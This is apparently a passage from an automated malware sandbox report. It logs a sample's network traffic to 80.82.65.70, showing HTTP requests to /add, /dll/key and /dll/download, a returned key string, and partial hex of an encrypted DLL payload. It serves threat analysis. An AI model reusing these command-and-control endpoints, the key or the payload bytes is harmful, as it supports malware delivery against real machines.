                                          Dec 13, 2024 08:36:35.767550945 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.768655062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.768827915 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.768879890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.769582987 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769596100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769634962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.769675016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.769913912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769927979 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.769977093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.770838022 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.770889044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.770893097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.770942926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.771642923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.771657944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.771688938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.771709919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.773739100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.773788929 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.773880959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.773966074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.774425983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.774499893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.774574995 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.774626970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.775204897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.775250912 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.775402069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.775455952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.857868910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.857887030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.857934952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.858269930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.858283043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.858325005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.858963013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859059095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.859071970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859124899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.859858036 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.859915018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923074961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923141003 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923154116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923183918 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923440933 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923475981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.923506021 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.923531055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.924390078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.924424887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.924473047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.924489975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.925335884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.925369978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.925390959 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.925424099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.926127911 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.926163912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.926181078 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.926219940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927153111 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927187920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927203894 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927236080 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.927927017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.927963018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.928009987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.928778887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.928833961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.928953886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929014921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.929686069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929735899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.929811001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.929873943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.930614948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.930649042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.930675983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.930704117 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.931469917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.931586981 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.931611061 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.931658030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.932518959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.932534933 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.932585001 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.933412075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.933423042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.933465958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.934098005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.934149027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.934185982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.934230089 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935071945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935082912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935123920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935132980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935877085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.935933113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.935956001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936001062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.936853886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936865091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.936907053 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.937685013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.937742949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.937777042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.937819958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.938564062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.938615084 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.938658953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.938869953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.939440012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.939487934 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.939554930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.939620018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.940340042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.940401077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.940468073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.940619946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.941293955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.941351891 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.941617966 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.941675901 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.942231894 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.942289114 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.942291975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.942342997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.943121910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.943177938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.943202019 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.943218946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.944001913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.944051027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.944370985 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.944417000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.944993019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.945003986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.945034027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.945058107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.945843935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.945857048 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.945904970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.945918083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.946697950 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.946711063 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.946751118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.947545052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.947597027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.947630882 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.947679996 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.948455095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.948621035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.948640108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.948688030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.949278116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.949328899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.949512959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.949558973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.950237036 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.950284958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.950306892 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.950382948 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.951217890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.951231003 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.951271057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.951311111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.952142954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.952155113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.952200890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.952999115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.953016996 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.953053951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.953071117 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.953794956 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.953860044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.953947067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.953994036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.954694986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.954737902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.954740047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.954782963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.955724001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.955773115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.955801010 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.955827951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.956474066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.956486940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.956523895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.956536055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.957392931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.957426071 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.957448006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.957470894 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.958256006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.958312988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.958458900 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.958553076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.959182978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.959233046 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.959284067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.959345102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.960283995 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.960319042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.960335016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.960364103 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.961086988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.961103916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.961146116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.961146116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.961966038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.961977959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.962018013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.962747097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.962811947 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.962872982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.962919950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.963628054 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.963684082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.963749886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.963807106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.964468956 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.964520931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.964622974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.964672089 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.965514898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.965572119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.965609074 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.965652943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.966310024 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.966324091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.966367960 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.049791098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.049849987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.049946070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.049993038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.050295115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.050307035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.050338030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.050352097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.051114082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.051223040 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.051248074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.051259041 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.052166939 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.052213907 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.115096092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.115166903 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.115178108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.115225077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.115395069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.115456104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.115535975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.115583897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:36.116242886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:36.116439104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:38.738873005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:38.738940954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:58.038837910 CET4977280192.168.2.480.82.65.70

                                          HTTP Request Dependency Graph

                                          • 80.82.65.70

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973680.82.65.70807324C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 08:35:55.353899002 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:56.728916883 CET204INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:56 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:35:56.743645906 CET386OUTGET /dll/key HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:57.217278957 CET224INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:56 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 21
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                          Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                          Dec 13, 2024 08:35:57.228630066 CET391OUTGET /dll/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:57.802604914 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:57 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                          Content-Length: 97296
                                          Keep-Alive: timeout=5, max=98
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                          Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                          Dec 13, 2024 08:35:57.802695036 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                          Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                          Dec 13, 2024 08:35:57.802711964 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                          Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                          Dec 13, 2024 08:35:57.802726984 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                          Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
